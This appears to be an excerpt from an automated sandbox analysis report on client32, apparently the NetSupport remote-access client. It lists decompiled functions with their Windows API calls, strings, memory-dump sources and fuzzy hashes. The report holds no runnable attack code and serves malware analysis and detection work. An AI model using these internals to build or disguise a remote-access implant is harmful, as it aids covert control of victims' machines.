                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                                                                    • String ID: NSMChatSizeWnd
                                                                                                                                                    • API String ID: 2883038198-4119039562
                                                                                                                                                    • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                                                                                    • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                                                                                    • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                                                                                    • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                                                                                    Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 110334CA
                                                                                                                                                    • _memset.LIBCMT ref: 11033501
                                                                                                                                                    • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                                                                                    • GetLastError.KERNEL32 ref: 11033534
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • _memmove.LIBCMT ref: 1103357E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                                                                                    • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                                                                                    • API String ID: 2414640225-228067302
                                                                                                                                                    • Opcode ID: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                                                                                    • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                                                                                    • Opcode Fuzzy Hash: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                                                                                    • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                                                                                    Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                                                                                    • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                                                                                    • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                                                                                    • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                                                                                    • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$Sleep
                                                                                                                                                    • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                                                                                    • API String ID: 4250438611-314227603
                                                                                                                                                    • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                                                    • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                                                                                    • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                                                                                    • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                                                                                    Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strncmp.LIBCMT ref: 1100953A
                                                                                                                                                    • _strncmp.LIBCMT ref: 1100954A
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,1EF76653), ref: 110095EB
                                                                                                                                                    Strings
                                                                                                                                                    • http://, xrefs: 11009535, 11009548
                                                                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                                                                    • IsA(), xrefs: 110095A5, 110095CD
                                                                                                                                                    • https://, xrefs: 1100952F
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp$FileWrite
                                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                    • API String ID: 1635020204-3154135529
                                                                                                                                                    • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                                                                    • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                                                                    • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                                                                                    • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                                                                    Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                                                                                    • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                                                                                    • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                                                                                    • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                                                                                    • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$ClassMessageNamePostTextWindow
                                                                                                                                                    • String ID: #32770$Tapiexe
                                                                                                                                                    • API String ID: 3170390011-3313516769
                                                                                                                                                    • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                                                                    • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                                                                                    • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                                                                                    • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                                                                                    Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                                                                                      • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                                                                                    • SetFocus.USER32(00000000), ref: 11023417
                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 1605826578-1986719024
                                                                                                                                                    • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                                                    • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                                                                    • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                                                    • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                                                                    Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                                                                                    • _memset.LIBCMT ref: 1114515E
                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 111451AA
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                                                                                    • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 74472576-4108050209
                                                                                                                                                    • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                                    • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                                                    • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                                                    • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                                                                    Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 11039768
                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                                                                                    • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                                                                                                    • GetParent.USER32(?), ref: 110397B6
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                                                                                    • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 818519836-0
                                                                                                                                                    • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                                                                                    • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                                                                                    • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                                                                                    • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                                                                                    Function 11153730 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 11153763
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                    • String ID:
